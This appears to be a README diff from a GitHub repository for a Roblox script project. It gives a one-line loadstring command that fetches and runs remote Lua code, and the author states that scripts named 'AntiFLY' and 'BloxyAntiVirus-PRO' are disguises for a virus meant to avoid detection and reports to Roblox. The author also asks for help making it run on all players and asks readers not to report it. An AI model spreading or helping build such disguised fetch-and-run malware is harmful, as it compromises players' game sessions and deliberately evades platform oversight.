ELJOKER900/Roblox-END-RoJack-R-J-/README.md

 loadstring(game:HttpGet(('https://raw.githubusercontent.com/ELJOKER900/Roblox-END/main/AntiFLY.Lua'), game.ReplicatedFirst)

-(WARNING, SCRIPTS DOES NOT WORKS BECAUSE IM SEARCHING THE BEST SCRIPT INIT , PLEASE WAIT) (and the "AntiVirus" not is an antivirus , It is the mask of the virus, which makes no one with the Dex editor suspicious) (And i need help to make that script executes on all players  )
+(WARNING, SCRIPTS DOES NOT WORKS BECAUSE IM SEARCHING THE BEST SCRIPT INIT , PLEASE WAIT) (and the "AntiFLY" and "BloxyAntiVirus-PRO" is the mask of the virus, which makes no one with the Dex editor report this to roblox)
+(And i need help to make that script executes on all players  )

 AND PLEASE DO NOT FEEDBACK THIS TO ROBLOX OR I WOULD BE BREACHING MY AGREEMENT